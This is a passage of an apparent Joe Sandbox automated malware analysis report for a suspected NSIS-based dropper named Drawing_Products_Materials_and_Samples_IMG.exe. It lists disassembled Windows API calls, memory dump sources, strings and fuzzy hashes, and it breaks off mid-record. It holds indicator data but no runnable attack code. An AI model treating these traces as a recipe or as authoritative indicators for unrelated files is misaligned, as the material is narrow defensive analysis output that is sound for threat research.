                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00403F38
                                                                                      • SetBkMode.GDI32(?,?), ref: 00403F44
                                                                                      • GetSysColor.USER32(?), ref: 00403F57
                                                                                      • SetBkColor.GDI32(?,?), ref: 00403F67
                                                                                      • DeleteObject.GDI32(?), ref: 00403F81
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00403F8B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(?), ref: 10002264
                                                                                      • GlobalAlloc.KERNEL32(?,?), ref: 1000228E
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022A3
                                                                                      • GlobalAlloc.KERNEL32(?,?), ref: 100022B2
                                                                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 100022BF
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100022C6
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100022FD
                                                                                        • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17896186253.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17896153967.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.17896219730.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.17896248787.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 3955009414-0
                                                                                      • Opcode ID: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                                                                      • Instruction ID: a605aeec0f08bdd00b0ee3428b37a4786007c3c680f5ed26bc2609ce7b065058
                                                                                      • Opcode Fuzzy Hash: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                                                                      • Instruction Fuzzy Hash: 5741AD70504306EFF364DFA48984B6BB7F8FB453E1F21492AF956C619ADB30A840DB61
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040476F
                                                                                      • GetMessagePos.USER32 ref: 00404777
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404791
                                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047A3
                                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047C9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                      • Instruction ID: e12531cc2cbda9362446d3482c890d37ab0b9233c447bf2f23075c067c261130
                                                                                      • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                      • Instruction Fuzzy Hash: 98014075D00219BAEB11DBA4DC45BFEBBBCAB55711F10412BBA10B71C0C7B465418BA5
                                                                                      APIs
                                                                                      • GetDC.USER32 ref: 00401D29
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                                                      • CreateFontIndirectA.GDI32(0040AFA0), ref: 00401DA1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID: Calibri
                                                                                      • API String ID: 3808545654-1409258342
                                                                                      • Opcode ID: 8af17ff95081d21d1027b9af728977dfff0c54460677ef1fa0b078a7428bad5a
                                                                                      • Instruction ID: f673732a1965e1841e3dc773f834cd1eb830dba4bc501641647caa1edf213688
                                                                                      • Opcode Fuzzy Hash: 8af17ff95081d21d1027b9af728977dfff0c54460677ef1fa0b078a7428bad5a
                                                                                      • Instruction Fuzzy Hash: BC0186B1958341AFE70157B06F1ABAB7F74A725705F100439F146B62E2C67C10158B2F
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(Unnarcotic33 Setup: Installing,Unnarcotic33 Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404592,000000DF,0000040F,00000400,00000000), ref: 00404700
                                                                                      • wsprintfA.USER32 ref: 00404708
                                                                                      • SetDlgItemTextA.USER32(?,Unnarcotic33 Setup: Installing), ref: 0040471B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s$Unnarcotic33 Setup: Installing
                                                                                      • API String ID: 3540041739-2646345114
                                                                                      • Opcode ID: 7a81a8563b002668758aa30ec7e0d3ef26a39900569464a91fec119d387db878
                                                                                      • Instruction ID: 4c0b19b1b1a6a4816020a8c86cd3a3baa7054b2c2c52423adae1d4b59055f951
                                                                                      • Opcode Fuzzy Hash: 7a81a8563b002668758aa30ec7e0d3ef26a39900569464a91fec119d387db878
                                                                                      • Instruction Fuzzy Hash: 40113A736002243AEB00A6799C01EEF3659DBD2335F14453BFA1AF50D2F97E981142A9
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(Unnarcotic33 Setup: Installing,Unnarcotic33 Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404592,000000DF,0000040F,00000400,00000000), ref: 00404700
                                                                                      • wsprintfA.USER32 ref: 00404708
                                                                                      • SetDlgItemTextA.USER32(?,Unnarcotic33 Setup: Installing), ref: 0040471B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s$Unnarcotic33 Setup: Installing
                                                                                      • API String ID: 3540041739-2646345114
                                                                                      • Opcode ID: e71bc9b29eeb09f43c78bc10772295be6f81fb3e8ed297937e24ce802457d4f2
                                                                                      • Instruction ID: b9eb64851fedaacd123e4baa5ce65a5686f114beaf7671e7a0f873141027489b
                                                                                      • Opcode Fuzzy Hash: e71bc9b29eeb09f43c78bc10772295be6f81fb3e8ed297937e24ce802457d4f2
                                                                                      • Instruction Fuzzy Hash: B911087360023437DB00A5699C05EAF325ECBC2334F14463BFA29F61D1E9799C5182E9
                                                                                      APIs
                                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A68
                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA4
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402AAD
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402AD2
                                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1912718029-0
                                                                                      • Opcode ID: 6ccabfd9daed6dfd24be4e757130db04132cda2359aedd25e4475ff07f213d8b
                                                                                      • Instruction ID: eecf360da6df2efa0186febf022189a705215a27ca05cea183c71e0b6ea401ae
                                                                                      • Opcode Fuzzy Hash: 6ccabfd9daed6dfd24be4e757130db04132cda2359aedd25e4475ff07f213d8b
                                                                                      • Instruction Fuzzy Hash: C4116D31600108BFDF219F90DE48DAA3B6DEB55348B108036FA06A00A0D7B89E519F69
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?), ref: 00401CD0
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: 021e644993cfb9adf629f3f775699f6f2d9ab0f22eaab13517154c12b5018b7c
                                                                                      • Instruction ID: 7c3280a60d84a3596340f685d6ada4bc9ba3972ea03b1155ec5ca5a37b5200ea
                                                                                      • Opcode Fuzzy Hash: 021e644993cfb9adf629f3f775699f6f2d9ab0f22eaab13517154c12b5018b7c
                                                                                      • Instruction Fuzzy Hash: 01F04FB2905104AFD701EBA4EE88CAFB7BCEB44301B004476F601F2091C638AD018B79
                                                                                      APIs
                                                                                      • SetWindowTextA.USER32(00000000,007A1F00), ref: 00403984
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: TextWindow
                                                                                      • String ID: "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"$1033$Unnarcotic33 Setup: Installing
                                                                                      • API String ID: 530164218-3264260489
                                                                                      • Opcode ID: d383edaf56b359519887456eaf9e12f5ab453c70e69a7f558b02cbb3a29e5497
                                                                                      • Instruction ID: e9ab1962833233591b25b756af0d4d76970a397b62c84286e92f90c0dad54111
                                                                                      • Opcode Fuzzy Hash: d383edaf56b359519887456eaf9e12f5ab453c70e69a7f558b02cbb3a29e5497
                                                                                      • Instruction Fuzzy Hash: 1111D8B1B046119BC724DF19DC809377BADEB86756318813FE902673A1D67D9D028B68
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 0040562F
                                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405638
                                                                                      • lstrcatA.KERNEL32(?,00409014), ref: 00405649
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405629
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-787714339
                                                                                      • Opcode ID: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                                                                      • Instruction ID: a924f5e5efff63b814f2bb1aba828fa5060afbb52db2a3f4b10526d23ad23d6c
                                                                                      • Opcode Fuzzy Hash: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                                                                      • Instruction Fuzzy Hash: 0FD0A962A059303AD2022A158C05E8F7A1CCF13301B040422F200B62A2CA3C6D418BFE
                                                                                      APIs
                                                                                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                                                      • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F09
                                                                                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                                                      • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                                                        • Part of subcall function 00405ADA: wsprintfA.USER32 ref: 00405AE7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1404258612-0
                                                                                      • Opcode ID: 15bbcb46c0304cebef2948dd90507b788932babe692363a3176a18277c5093b4
                                                                                      • Instruction ID: e997095eb8ac9b39cb2e990ea4d9d7297676044432be4d967855e01db0d67fff
                                                                                      • Opcode Fuzzy Hash: 15bbcb46c0304cebef2948dd90507b788932babe692363a3176a18277c5093b4
                                                                                      • Instruction Fuzzy Hash: 80112E71900108BEDB01EFA5DD85DAEBBB9EF04344B20807AF505F61E2D779AE54DB28
                                                                                      APIs
                                                                                      • CharNextA.USER32(?,?,Grundsprogs.but,?,0040572E,Grundsprogs.but,Grundsprogs.but,?,?,773E3410,00405479,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 004056D0
                                                                                      • CharNextA.USER32(00000000), ref: 004056D5
                                                                                      • CharNextA.USER32(00000000), ref: 004056E9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID: Grundsprogs.but
                                                                                      • API String ID: 3213498283-3503724756
                                                                                      • Opcode ID: 594f31a488926a8360d4dc687cc681d5945629fa4112d744ade59810bb8e8aa4
                                                                                      • Instruction ID: 5a28b070b40ebc86f9924178211a5f21c719a032cfd05c28209d31321f5df37b
                                                                                      • Opcode Fuzzy Hash: 594f31a488926a8360d4dc687cc681d5945629fa4112d744ade59810bb8e8aa4
                                                                                      • Instruction Fuzzy Hash: B4F0F651909F90ABFF3252680C40B7B5B88CB55315F14047BE245772C1C27D48419F9A
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,00402DAF,00000001), ref: 00402BE2
                                                                                      • GetTickCount.KERNEL32 ref: 00402C00
                                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402B4C,00000000), ref: 00402C1D
                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402C2B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      • Opcode ID: 11c433d574e92544add56911f42870682812084ac0052d1f61e8685336716005
                                                                                      • Instruction ID: 8678601a89ebf594b1e28a4f8d2629398f35c478b0c465e21920113c9fb71305
                                                                                      • Opcode Fuzzy Hash: 11c433d574e92544add56911f42870682812084ac0052d1f61e8685336716005
                                                                                      • Instruction Fuzzy Hash: D4F0D030909620BFC6516F58BD4CE5F7BA4E745B117518467F204A11A5C27CA8828FAD
                                                                                      APIs
                                                                                        • Part of subcall function 00405B7C: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B89
                                                                                        • Part of subcall function 004056C2: CharNextA.USER32(?,?,Grundsprogs.but,?,0040572E,Grundsprogs.but,Grundsprogs.but,?,?,773E3410,00405479,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 004056D0
                                                                                        • Part of subcall function 004056C2: CharNextA.USER32(00000000), ref: 004056D5
                                                                                        • Part of subcall function 004056C2: CharNextA.USER32(00000000), ref: 004056E9
                                                                                      • lstrlenA.KERNEL32(Grundsprogs.but,00000000,Grundsprogs.but,Grundsprogs.but,?,?,773E3410,00405479,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 0040576A
                                                                                      • GetFileAttributesA.KERNEL32(Grundsprogs.but,Grundsprogs.but,Grundsprogs.but,Grundsprogs.but,Grundsprogs.but,Grundsprogs.but,00000000,Grundsprogs.but,Grundsprogs.but,?,?,773E3410,00405479,?,C:\Users\user\AppData\Local\Temp\,773E3410), ref: 0040577A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: Grundsprogs.but
                                                                                      • API String ID: 3248276644-3503724756
                                                                                      • Opcode ID: 5c82dc3b8e95f65848b85918bc03a8054e03177c087216e2edc28b62bc63e4a6
                                                                                      • Instruction ID: 2c4d446db1e29420e5923440945fccaca4e70662f99b186e828cb85218ee0e95
                                                                                      • Opcode Fuzzy Hash: 5c82dc3b8e95f65848b85918bc03a8054e03177c087216e2edc28b62bc63e4a6
                                                                                      • Instruction Fuzzy Hash: D8F0C835105D5096C72637391C49AAF1A55CE87334F5C0A3BFCA4B72D2DA3C8942EDAE
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,773E3410,0040356A,004033AE,?), ref: 004035AC
                                                                                      • GlobalFree.KERNEL32(00B122D0), ref: 004035B3
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004035A4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 1100898210-787714339
                                                                                      • Opcode ID: a867077822133ff692d23af0c54fa15bc8068d047174f32ce19527d60d8a5524
                                                                                      • Instruction ID: b9a2e2ce0aef398ad33b1e441a7329442b5d03f4bc4d662dbe049a431942ec15
                                                                                      • Opcode Fuzzy Hash: a867077822133ff692d23af0c54fa15bc8068d047174f32ce19527d60d8a5524
                                                                                      • Instruction Fuzzy Hash: CAE01233805530ABC6215F55FE04B5AB7686F99B23F05406BED407B2B087BCAD42CBD9
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,80000000,00000003), ref: 00405676
                                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,80000000,00000003), ref: 00405684
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrlen
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 2709904686-3443045126
                                                                                      • Opcode ID: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                                                                      • Instruction ID: 65254a9ec8b5df5b99da38f47da5785a41c3eb4d4675478388f5dfb88e302bf1
                                                                                      • Opcode Fuzzy Hash: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                                                                      • Instruction Fuzzy Hash: 7AD0A762808D702EF30356108C04B9F6A98CF12300F0A08A2E040A61D1D67D5C414BBE
                                                                                      APIs
                                                                                        • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                                                                        • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                                                                      • GlobalAlloc.KERNEL32(?,?), ref: 1000115B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                      • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                      • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17896186253.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17896153967.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.17896219730.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.17896248787.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloclstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 852173138-0
                                                                                      • Opcode ID: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
                                                                                      • Instruction ID: 26a7307167ea038f6128c28db1d5d02e0c11c1c5116c5a7ce728bb40d8b914e2
                                                                                      • Opcode Fuzzy Hash: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
                                                                                      • Instruction Fuzzy Hash: E431BAB2808254AFF705CF64EC89AEA7FE8EB052C0B164116FA45D626CDB349910CB28
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,004059A1,00000000,[Rename]), ref: 0040579F
                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 004057B7
                                                                                      • CharNextA.USER32(?,?,00000000,004059A1,00000000,[Rename]), ref: 004057C8
                                                                                      • lstrlenA.KERNEL32(?,?,00000000,004059A1,00000000,[Rename]), ref: 004057D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                                                                      • Instruction ID: 45b2fc5df358d27cb7a89cd885ee1e3cc50cd312c5ff5344edc01a70ab2dde4a
                                                                                      • Opcode Fuzzy Hash: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                                                                      • Instruction Fuzzy Hash: 71F06235504518FFC7129BA5DC4099FBBA8EF55350F2540AAE800F7250D674EE01ABA9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: N
                                                                                      • API String ID: 0-1130791706
                                                                                      • Opcode ID: 2cfd961db89a1b246602a34f90364f2b4b1fc878013fa89435244d17e777a737
                                                                                      • Instruction ID: 75a72d58f138e2a13651315ca72e591744eba5ad9b1676347b4d4f519e5f95a7
                                                                                      • Opcode Fuzzy Hash: 2cfd961db89a1b246602a34f90364f2b4b1fc878013fa89435244d17e777a737
                                                                                      • Instruction Fuzzy Hash: E573F671C1075A8EDB11EF68C854AD9F7B1FF99300F51C69AE4486B221EB70AAD4CF81
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      • Opcode ID: f9621860ee068e6b91d7afbdfa09fe6c856f3b972a1b0596fd47f1267206602d
                                                                                      • Instruction ID: 854aecad3578b84669a923326d5cbdad9fca57d25f9b2371bbbdd901c529070b
                                                                                      • Opcode Fuzzy Hash: f9621860ee068e6b91d7afbdfa09fe6c856f3b972a1b0596fd47f1267206602d
                                                                                      • Instruction Fuzzy Hash: D181B474E01608CFEB58DFAAD944ADDBBF2BF88310F148069E819AB365DB305981DF11
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      • Opcode ID: 983ef815a29a5113ac6455738e046adceb6656fe9ec80ed0d81d8fc11c341ccd
                                                                                      • Instruction ID: ebfa2bfcd8b1ecc083632f25a5bd909980ee9dc239d89f3c674aecab239cd75d
                                                                                      • Opcode Fuzzy Hash: 983ef815a29a5113ac6455738e046adceb6656fe9ec80ed0d81d8fc11c341ccd
                                                                                      • Instruction Fuzzy Hash: 2881B374E05218CFEB58DFAAD844ADDBBF2BF89300F148069E409AB365EB305981DF54
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      • Opcode ID: 17842878a7ab986cd66d473983620be9c6cc0322f9a98e03d76f7356a5aeefaa
                                                                                      • Instruction ID: 65c4485154ff9075b619074d6aaccb28b755e52a60eb3fe4c6fe9607a9426f2d
                                                                                      • Opcode Fuzzy Hash: 17842878a7ab986cd66d473983620be9c6cc0322f9a98e03d76f7356a5aeefaa
                                                                                      • Instruction Fuzzy Hash: 67819374E00218CFEB58DFAAD944ADDBBF2BF89300F14D069E819AB265DB345981DF50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      • Opcode ID: 0d77bac7913b10874ca37306d7e00daa139301442107c5e0babb18c820ed7d26
                                                                                      • Instruction ID: 853403ecf724cbb2db08f7cb4c338262f2405c9bdc78f2c6a88d2762e27fc435
